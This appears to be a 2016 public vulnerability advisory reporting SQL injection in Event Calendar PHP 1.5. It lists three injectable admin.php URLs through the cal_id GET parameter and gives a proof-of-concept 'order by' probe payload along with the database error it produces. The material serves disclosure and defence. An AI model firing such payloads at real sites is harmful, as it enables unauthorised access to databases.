30 lines
No EOL
1.1 KiB
Text
30 lines
No EOL
1.1 KiB
Text
=====================================================
|
|
# Event Calendar PHP 1.5 - SQL Injection
|
|
=====================================================
|
|
# Vendor Homepage: http://eventcalendarphp.com/
|
|
# Date: 21 Oct 2016
|
|
# Version : 1.5
|
|
# Platform : WebApp - PHP
|
|
# Author: Ashiyane Digital Security Team
|
|
# Contact: hehsan979@gmail.com
|
|
=====================================================
|
|
# PoC:
|
|
Vulnerable Url:
|
|
http://localhost/eventcalendar/admin.php?act=options&cal_id=[payload]
|
|
http://localhost/eventcalendar/admin.php?act=cal_options&cal_id=[payload]
|
|
http://localhost/eventcalendar/admin.php?act=cal_language&cal_id=[payload]
|
|
Vulnerable parameter : cal_id
|
|
Mehod : GET
|
|
|
|
A simple inject :
|
|
Payload : '+order+by+20--+
|
|
http://localhost/eventcalendar/admin.php?act=options&cal_id=1'+order+by+20--+
|
|
|
|
In response can see result :
|
|
query error: SELECT * FROM pa_ecal_calendars WHERE cal_id='1' order by
|
|
20-- '. Error: Unknown column '20' in 'order clause'
|
|
|
|
Result of payload: Error: Unknown column '20' in 'order clause'
|
|
=====================================================
|
|
# Discovered By : Ehsan Hosseini
|
|
===================================================== |